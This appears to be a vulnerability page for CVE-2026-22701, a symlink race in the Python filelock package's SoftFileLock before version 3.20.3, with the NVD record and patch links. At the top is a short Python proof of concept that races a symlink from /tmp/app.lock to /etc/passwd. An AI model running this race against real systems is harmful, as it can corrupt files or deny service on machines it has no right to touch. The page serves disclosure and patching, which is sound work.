CVE-2026-22701

import os import time import threading import filelock def exploit(): target = '/etc/passwd' lock_file = '/tmp/app.lock' # 清理旧文件 if os.path.exists(lock_file): os.unlink(lock_file) # 竞态条件PoC def attack(): time.sleep(0.001) # 等待权限检查完成 os.symlink(target, lock_file) t = threading.Thread(target=attack) t.start() lock = filelock.SoftFileLock(lock_file) lock.acquire(timeout=1) t.join() print('PoC完成') if __name__ == '__main__': exploit()

{"cve": {"id": "CVE-2026-22701", "sourceIdentifier": "[email protected]", "published": "2026-01-10T06:15:52.673", "lastModified": "2026-03-05T13:50:02.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "filelock is a platform-independent file lock for Python. Prior to version 3.20.3, a TOCTOU race condition vulnerability exists in the SoftFileLock implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the _acquire() method between raise_on_not_writable_file() (permission check) and os.open() (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. This issue has been patched in version 3.20.3."}, {"lang": "es", "value": "filelock es un bloqueo de archivos independiente de la plataforma para Python. Antes de la versión 3.20.3, existe una vulnerabilidad de condición de carrera TOCTOU en la implementación SoftFileLock del paquete filelock. Un atacante con acceso al sistema de archivos local y permiso para crear enlaces simbólicos puede explotar una condición de carrera entre la validación de permisos y la creación de archivos para hacer que las operaciones de bloqueo fallen o se comporten de manera inesperada. La vulnerabilidad ocurre en el método _acquire() entre raise_on_not_writable_file() ('verificación de permisos') y os.open() ('creación de archivos'). Durante esta ventana de carrera, un atacante puede crear un enlace simbólico en la ruta del archivo de bloqueo, lo que podría hacer que el bloqueo opere en un archivo de destino no deseado o que conduzca a una denegación de servicio. Este problema ha sido parcheado en la versión 3.20.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-362"}, {"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tox-dev:filelock:*:*:*:*:*:python:*:*", "versionEndExcluding": "3.20.3", "matchCriteriaId": "C256B12F-691F-41C6-AFFF-DA6AF024AB6F"}]}]}], "references": [{"url": "https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw", "source": "[email protected]", "tags": ["Mitigation", "Patch", "Vendor Advisory"]}]}}